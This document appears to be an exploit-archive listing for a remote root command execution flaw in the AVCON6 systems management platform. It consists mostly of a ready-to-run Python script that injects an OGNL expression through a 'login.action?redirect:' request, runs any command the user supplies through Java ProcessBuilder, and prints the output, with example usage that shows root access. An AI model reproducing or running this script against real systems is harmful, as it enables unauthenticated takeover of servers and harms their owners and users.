AVCON6 Systems Management Platform suffers from a remote root command execution vulnerability.

MD5 | 30cc08a1ee45edf5711ca6ba498148e6

# Exploit Title: AVCON6 systems management platform - OGNL - Remote root command execution
# Date: 10/09/2018
# Exploit Author: Nassim Asrir
# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/
# CVE: NA
# Tested On: Windows 10(64bit) / 61.0b12 (64-bit)
# Thanks to: Otmane Aarab
# Example below:
# python ./rce.py http://server:8080/ id
# Testing Target: http://server:8080/
# uid=0(root) gid=0(root)
# Vendor: http://www.epross.com/
# About the product: The AVCON6 video conferencing system is the most complete set of systems, including multi-screen multi-split screens and systems that are integrated with H323/SIP protocol devices. High-end video conferencing
# software ideal for Room Base environments and performance requirements. Multi-party video conferencing can connect thousands of people at the same time.
# I am not responsible for any wrong use.
######################################################################################################

#!/usr/bin/python
# -*- coding: utf-8 -*-

import urllib2
import httplib


def exploit(url, cmd):
payload = 'login.action?redirect:'
payload += '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22'+cmd+'%22})).'
payload += 'start(),%23b%3d%23a.getInputStream(),'
payload += '%23c%3dnew%20java.io.InputStreamReader(%23b),'
payload += '%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d'
payload += '.read(%23e),%23matt%3d%23context.'
payload += 'get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),'
payload += '%23matt.getWriter().println(%23e),%23matt.'
payload += 'getWriter().flush(),%23matt.getWriter()'
payload += '.close()}'


try:
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'}
request = urllib2.Request(url+payload, headers=headers)
page = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
page = e.partial

print(page)
return page


if __name__ == '__main__':
import sys
if len(sys.argv) != 3:
print("[*] struts2_S2-045.py http://target/ id")
else:
print('[*] Avcon6-Preauh-Remote Command Execution')
url = sys.argv[1]
cmd = sys.argv[2]
print("[*] Executed Command: %sn" % cmd)
print("[*] Target: %sn" % url)
exploit(url, cmd)

Source